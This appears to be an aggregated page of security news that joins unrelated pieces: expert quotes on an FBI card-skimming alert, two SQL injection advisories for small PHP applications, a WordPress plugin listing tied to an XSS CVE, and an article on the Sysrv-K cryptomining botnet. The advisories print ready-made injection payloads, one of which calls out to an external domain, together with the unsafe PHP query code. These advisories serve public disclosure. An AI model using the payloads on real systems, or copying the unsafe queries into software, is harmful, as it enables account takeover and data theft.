**Businesses Should Take Alert 'Seriously'**  
Cyvatar CISO Dave Cundiff explained in an emailed reaction to the alert that basic cybersecurity hygiene and monitoring would be enough to fend off this sort of attack. 

"Continually verifying and monitoring an organization's fundamental cybersecurity is a requirement these days," Cundiff said. "If the fundamentals of an organization’s security are not strong, then the additional complexity of any additional security is useless." 

US businesses should take this alert seriously, according to Kunal Modasiya, senior director of product management at PerimeterX,.

"Given the risks of supply-chain attacks in general, it is important that businesses look beyond server-side security tools, such as static code analysis, external scanners, and the limitations of CSP to solutions," Modasiya says. 

Ron Bradley, vice president of Shared Assessments, meanwhile notes that organizations dealing with credit-card data, which he called "one of the crown jewels for fraudsters," should have technical controls like file integrity monitoring (FIM) in place.  

"If you're running a website, especially one which transacts funds, and if you don't have FIM implemented, I don't want to shop there," Bradley said. "Furthermore, you're going to get pummeled by bad actors because you don't have your house in order."

FBI: E-Tailers, Beware Web Injections for Scraping Credit-Card Data, Backdoors

In Covid 19 Travel Pass Management 1.0, the code parameter is vulnerable to SQL injection attacks.

The code parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load\_file('\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\kyy'))+' was submitted in the code parameter. This payload injects a SQL sub-query that calls MySQL's load\_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can take administrator accounts control and also of all accounts on this system, also the malicious user can download all information about this system.

\--\-
Parameter: code (GET)
    Type: boolean\-based blind
    Title: OR boolean\-based blind \- WHERE or HAVING clause (NOT)
    Payload: page\=view\_pass&code\=775545'+(select load\_file('\\\\\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\\\kyy'))+'' OR NOT 7325=7325 AND 'vRQn'\='vRQn

    Type: error\-based
    Title: MySQL \>= 5.0 AND error\-based \- WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: page\=view\_pass&code\=775545'+(select load\_file('\\\\\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\\\kyy'))+'' AND (SELECT 1607 FROM(SELECT COUNT(\*),CONCAT(0x7171707071,(SELECT (ELT(1607=1607,1))),0x7176707171,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a) AND 'HjrM'\='HjrM

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: page\=view\_pass&code\=775545'+(select load\_file('\\\\\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\\\kyy'))+'' AND (SELECT 2775 FROM (SELECT(SLEEP(5)))lkxH) AND 'bdqR'\='bdqR

    Type: UNION query
    Title: MySQL UNION query (NULL) \- 10 columns
    Payload: page\=view\_pass&code\=775545'+(select load\_file('\\\\\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\\\kyy'))+'' UNION ALL SELECT NULL,CONCAT(0x7171707071,0x584d675163465844744f504c484d4256425463675863674948566f6b68474f464f64634e6b5a596a,0x7176707171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
\---

<?php

if(isset($\_GET\['code'\]) && $\_GET\['code'\] > 0){
    $qry = $conn\->query("SELECT \* FROM application\_list where code = '{$\_GET\['code'\]}'");
    if($qry\->num\_rows > 0){
        foreach($qry\->fetch\_assoc() as $k => $v){
            $$k\=$v;
        }
		if(isset($individual\_id)){
			$user\_qry = $conn\->query("SELECT \*, concat(lastname, ', ', firstname, ' ', coalesce(middlename,'')) as \`name\` from \`individual\_list\` where id = '{$individual\_id}' ");
			if($qry\->num\_rows > 0){
				foreach($user\_qry\->fetch\_assoc() as $k => $v){
					$inv\[$k\]=$v;
				}
				$meta\_qry = $conn\->query("SELECT \* FROM \`individual\_meta\` where \`individual\_id\` = '{$individual\_id}' ");
				while($row = $meta\_qry\->fetch\_assoc()){
					$inv\[$row\['meta\_field'\]\] = $row\['meta\_value'\];
				}
			}
		}
    }
}
?>

CVE-2022-30054: CVE-nu11secur1ty/vendors/oretnom23/2022/Covid-19-Travel-Pass-Management at main · nu11secur1ty/CVE-nu11secur1ty

In Home Clean Service System 1.0, the password parameter is vulnerable to SQL injection attacks.

**Home Clean Service System****Vendor**

**Description:**

The password parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the password parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. The attacker can take administrator account control and also of all accounts on this system, also the malicious user can download all information about this system.

Status: CRITICAL

\[+\] Payloads:

\--\-
Parameter: MULTIPART email ((custom) POST)
    Type: boolean\-based blind
    Title: OR boolean\-based blind \- WHERE or HAVING clause (NOT)
    Payload: \--\----WebKitFormBoundary8kMPLwTOJeesgEBx
Content\-Disposition: form\-data; name\="email"

uufQHiPr@namaikatiputkata.net' OR NOT 6564=6564-- aWQp
\------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="password"
t8I!x2y!H3'
\--\----WebKitFormBoundary8kMPLwTOJeesgEBx
Content\-Disposition: form\-data; name\="login"

\--\----WebKitFormBoundary8kMPLwTOJeesgEBx--

    Type: error\-based
    Title: MySQL \>= 5.0 AND error\-based \- WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: \--\----WebKitFormBoundary8kMPLwTOJeesgEBx
Content\-Disposition: form\-data; name\="email"

uufQHiPr@namaikatiputkata.net' AND (SELECT 6279 FROM(SELECT COUNT(\*),CONCAT(0x7176716271,(SELECT (ELT(6279=6279,1))),0x716a767871,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)-- LSfT
\------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="password"
t8I!x2y!H3'
\--\----WebKitFormBoundary8kMPLwTOJeesgEBx
Content\-Disposition: form\-data; name\="login"

\--\----WebKitFormBoundary8kMPLwTOJeesgEBx--

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: \--\----WebKitFormBoundary8kMPLwTOJeesgEBx
Content\-Disposition: form\-data; name\="email"

uufQHiPr@namaikatiputkata.net' AND (SELECT 4830 FROM (SELECT(SLEEP(5)))kgBM)-- GxTm
\------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="password"
t8I!x2y!H3'
\--\----WebKitFormBoundary8kMPLwTOJeesgEBx
Content\-Disposition: form\-data; name\="login"

\--\----WebKitFormBoundary8kMPLwTOJeesgEBx--
\--\-

**Vulnerable code:**

<?php
	session\_start();
	$username = $\_POST\['username'\];
	$password = $\_POST\['password'\];
	if(ISSET($\_POST\['login'\])){
		$conn = new mysqli("localhost","root","","activity") or die(mysqli\_error());
		$query = $conn\->query("SELECT \*FROM \`admin\` WHERE \`username\` = '$username' && \`password\` = '$password'") or die(mysqli\_error());
		$fetch = $query\->fetch\_array();
		$valid = $query\->num\_rows;
			if($valid > 0){
				$\_SESSION\['admin\_id'\] = $fetch\['admin\_id'\];
				header("location:./dashboard.php");
			}else{
				echo "<script>alert('Invalid username or password')</script>";
				echo "<script>window.location = 'index.php'</script>";
			}
		$conn\->close();
	}	

**Reproduce:**

href

**Proof and Exploit:**

href

CVE-2022-30052: CVE-nu11secur1ty/vendors/acetech/2022/Home-Clean-Service-System at main · nu11secur1ty/CVE-nu11secur1ty

Persistent Cross-Site Scripting (XSS) vulnerability in Alexander Stokmann's Code Snippets Extended plugin <= 1.4.7 on WordPress via Cross-Site Request Forgery (vulnerable parameters &title, &snippet_code).

*   Details
*   Reviews
*   Support
*   Development

This plugin has been closed as of May 17, 2022 and is not available for download. This closure is temporary, pending a full review.

Simple, with preview and versatile.

Nice idea of a plugin. Sadly however php code doesn't work. Even the provided examples are not running as the " are all escaped. Too bad 🙁

allows us to add php anywhere using shortcodes. No more messing with functions.php file, making custom page templates or spawning child themes for a bit of custom logic. AMAZING

Thank you for this plugin! Helps me a lot!

I've tried several plugins to be able to add code easily and this one has always been the best experience of all. Surprised it isn't more popular!

Very very good! Using a very simple and a good helper!

Read all 10 reviews

“Code Snippets Extended” is open source software. The following people have contributed to this plugin.

Contributors

*    aftamat4ik

CVE-2022-29436: Code Snippets Extended

By Deeba Ahmed
Microsoft has discovered a new Sysrv botnet variant deploying cryptocurrency miners on Windows and Linux systems. The Microsoft…
This is a post from HackRead.com Read the original post: New Sysrv-k Botnet Infecting Windows and Linux Systems with Cryptominer

Microsoft has discovered a new Sysrv botnet variant deploying cryptocurrency miners on Windows and Linux systems.

The Microsoft Security Intelligence team posted a series of tweets on their official Twitter handle (@MsftSecIntel) to reveal startling details on the new variant of the notorious Sysrv botnet dubbed Sysrv-K.

According to the thread, the new variant exploits vulnerabilities recently identified in the Spring Framework’s API gateway called the Spring Cloud Gateway and WordPress and deploys cryptocurrency miners on Windows and Linux systems.

**How does the Botnet work?**

According to Microsoft, the botnet first scans the web to identify vulnerable servers and installs itself. The vulnerabilities it looks for include remote file disclosure, remote code execution, path traversal, and arbitrary file download.

The tech giant noted that Sysrv-K exploits numerous old flaws, particularly those identified in WordPress, as well as new vulnerabilities like CVE-2022-22947, which has a CVSS score of 10 and affects the Spring Cloud Gateway and Oracle’s Communications Cloud-Native Core Network Exposure Function.

The vulnerability exposes apps to code injection attacks and allows unauthorized attackers to carry out remote code execution. Interestingly, all these vulnerabilities have patches.

**Details of Sysrv and Sysrv-K**

The Sysrv botnet has been active since late 2020 and exploits known security flaws in access interfaces to install a Monero crypto miner on compromised Windows and Linux systems. The older version of the botnet targeted databases and web apps, such as Confluence, Jira, MongoDB, Oracle WebLogic, ThinkPHP, Mongo-Express, Drupal, Apache Struts, and Salt-API, reported Juniper in 2021.

The new version comes with a range of new features. Such as it can scan for WordPress configuration files and their backups to extract database credentials. The botnet uses the information to control the webserver.

Additionally, it boasts advanced communication features, including using a Telegram bot. It can scan for SSH keys, hostnames, and IP addresses and spread its copies across the network to infect the entire network and make it a part of its botnet army.

Microsoft Security Intelligence team on Twitter

**More Linux and Windows Botnet News**

1.  Old crypto-malware makes come back, hits Windows, Linux devices
2.  Kraken botnet bypasses Windows Defender to steal crypto wallet data
3.  HolesWarm crypto-malware hits unpatched Linux and Windows servers
4.  Beware; Adwind RAT infecting Windows, OS X, Linux and Android Devices
5.  Linux & Windows hit with disk wiper, ransomware & crypto Xbash malware

**How to Stay Safe?**

Microsoft suggests that organizations using internet-exposed Linux or Windows systems must install security updates immediately as it is imperative to secure these systems. They must ensure “building credential hygiene” and timely apply security updates.

Tag

#php